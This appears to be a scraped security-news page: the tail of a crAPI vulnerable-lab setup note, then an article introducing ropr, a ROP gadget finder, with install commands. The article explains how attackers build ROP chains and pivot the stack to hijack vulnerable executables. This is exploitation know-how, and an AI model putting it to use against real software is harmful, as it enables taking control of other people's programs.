    Note: All emails are sent to mailhog service and can be checked on http://192.168.33.20:8025

    Once you're done playing with crAPI, you can remove it completely from your system running the following command from the repository root directory

    $ cd deploy/vagrant && vagrant destroy

    For more deployment options visit the setup instructions for more details.

    To know more about challenges in crAPI. Visit challenges



Ropr - A Blazing Fast Multithreaded ROP Gadget Finder. Ropper / Ropgadget Alternative

By: Zion3R
18 August 2022 at 12:30


ropr is a blazing fast multithreaded ROP Gadget finder

What is a ROP Gadget?

ROP (Return Oriented Programming) Gadgets are small snippets of a few assembly instructions typically ending in a ret instruction which already exist as executable code within each binary or library. These gadgets may be used for binary exploitation and to subvert vulnerable executables.

When the addresses of many ROP Gadgets are written into a buffer we have formed a ROP Chain. If an attacker can move the stack pointer into this ROP Chain then control can be completely transferred to the attacker.

Most executables contain enough gadgets to write a turing-complete ROP Chain. For those that don't, one can always use dynamic libraries contained in the same address-space such as libc once we know their addresses.

The beauty of using ROP Gadgets is that no new executable code needs to be written anywhere - an attacker may achieve their objective using only the code that already exists in the program.


How do I use a ROP Gadget?

Typically the first requirement to use ROP Gadgets is to have a place to write your ROP Chain - this can be any readable buffer. Simply write the addresses of each gadget you would like to use into this buffer. If the buffer is too small there may not be enough room to write a long ROP Chain into and so an attacker should be careful to craft their ROP Chain to be efficient enough to fit into the space available.

The next requirement is to be able to control the stack - This can take the form of a stack overflow - which allows the ROP Chain to be written directly under the stack pointer, or a "stack pivot" - which is usually a single gadget which moves the stack pointer to the rest of the ROP Chain.

Once the stack pointer is at the start of your ROP Chain, the next ret instruction will trigger the gadgets to be excuted in sequence - each using the next as its return address on its own stack frame.

It is also possible to add function poitners into a ROP Chain - taking care that function arguments be supplied after the next element of the ROP Chain. This is typically combined with a "pop gadget", which pops the arguments off the stack in order to smoothly transition to the next gadget after the function arguments.

How do I install ropr?

  • Requires cargo (the rust build system)

Easy install:

cargo install ropr

the application will install to ~/.cargo/bin

From source:

git clone https://github.com/Ben-Lichtman/ropr
cd ropr
cargo build --release

the resulting binary will be located in target/release/ropr

Alternatively:

git clone https://github.com/Ben-Lichtman/ropr
cd ropr
cargo install --path .

the application will install to ~/.cargo/bin

How do I use ropr?

For example if I was looking for a way to fill rax with a value from another register I may choose to filter by the regex ^mov eax, ...;:
Now I can add some filters to the command line for the highest quality results:
Now I have a good mov gadget candidate at address 0x00052252

❌
❌